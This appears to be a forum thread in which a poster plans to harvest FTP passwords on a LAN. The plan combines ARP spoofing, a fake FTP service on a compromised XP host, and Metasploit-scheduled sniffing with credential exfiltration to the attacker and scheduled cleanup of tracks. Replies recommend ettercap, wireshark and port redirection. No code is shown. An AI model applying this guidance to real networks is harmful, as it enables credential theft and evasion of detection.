Nice idea, but way to over complicated. Simply Arp Spoof them so you can read the ftp servers traffic (the passwords are plaintext)
'Attacker controlled honeypot' Scenario
Consider this scenario,
there are two hosts in the lan, one is ftp server and it has some interesting data which can be gaind with the right ftp access, let say it's a well secured linux based os. The other is xp office box and the attacker gaind access and admin privileges on it remotely, controlling the host through the router that separate the lan and outher world.
Main idea ,from attacker point of view is to install the 'attacker controlled honeypot' on the xp box that is going to imitate the FTP server on the first box.
So, if the attacker succeed in fooling the gateway to redirect all trafic intended for the victim (real FTP server box) to his pwnd xp box, the FTP users will end up connecting to the box pwnd by remote attacker and give their username and pass to 'attacker controlled honeypot'.
I'm trynig to make this setup in my virtual environment. There are few things i'm not familiar with, and i will appreciate some tips. The 'honeypot' that has to be planted on the xp box could be a small program like ,lets say netcat and then it's output could be redirected wherever i want, but the honeyput appearing screen should be like FTP server screen, so i need some kind of 'honeypot like' easy to set up small program, or something like msf modul (if somebody has write something like this).
The outher way that is probably the right way is to write a small program,
programing the winsock to act like ftp server ,store the data ,exit on storing pass buffer and stop the arp spoofing process, so that ftp user will be disconected. And when he try to connect again he will be redirected to, i hope to real FTP server.
I must say that for now i don't have so much time for going into winsock programing, for now.
So if there is some kind of honeypot right for this purpose...
I'm hope that my scenario have some sence 'couse if i had time for going through it i will put it in my final exam on my university.
Every opinion on this is wellcome.
Nice idea, but way to over complicated. Simply Arp Spoof them so you can read the ftp servers traffic (the passwords are plaintext)
Three factor scenario (though you can load ettercap onto the box, and it would be easier):
1. Redirection to XP box FTP service, however you want to do it.
2. Get a copy of FPort.exe (foundstone - Port redirection), set it up to bounce any connections to XP:FTP to Linux:FTP
3. Start wireshark.
It doesn't cover active FTP coming back, which could be a problem, but if the router is controlling, then it probably isn't and passive will be enough.
I agree with hitthemlow, just change the arp tables and ettercap it.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Edit: Not sure how the double post happened. Site lag. If someone wants to delete this one, go ahead.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Thx for the replys.
Got the point, but I was thinking that this could be quitter way ,if you will be in abble to automatize the whole process then you don't have to stay connected remotely and make some noizy trafic, examing the packets remotely or something.
What i had in mind is that the arp spoof rutine could be automated to run at specific time of day ,date ,and the 'honeypot' could collect a 'bunch' of users and pass ,and then just send them all through port 80 to the attackers box, or something like that. Problem is that this is gona be too noizy 'cause the users would not be able to access the real FTP server then.
What makes this even more complicated to setup the right way.
It's possibly, but yes it is way to over complicated, i see now.
The arp spoof isn't going to deny them access, also I can not think of a single legitimate use for this.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Also what's wrong in exercise on different setups when we are talking about security?I'm trynig to make this setup in my virtual environment.
And using BT which main page is called 'Offensive Security'.
Thx again.
i guess this is a start Security and Networking - Blog - Meterpreter Sniffer*Module
Now we just need a arp module.
I would rather be hated for what i am,
Then loved for what i am not.
cr1spyj0nes, exactly. Thats the good start.
What i had in mind that Scheduleme Meterpreter Script can be used, or Schtaskabuse Script to transfer the capture.cap to the desired location.
Again the Security and Networking - Blog - Abusing the Scheduler with Meterpreter show how to do it.
If i give up from implementing the 'honeypot', what was the main idea, but not so effecient. Then arpspoof can be scheduled too. Uploading some arpspoof program and set start time using msf schedule scripts.
What gives me idea, that some cleanup tracks scripts could be scheduled too.
Oh msf is fountain of opportunities.
Posting Permissions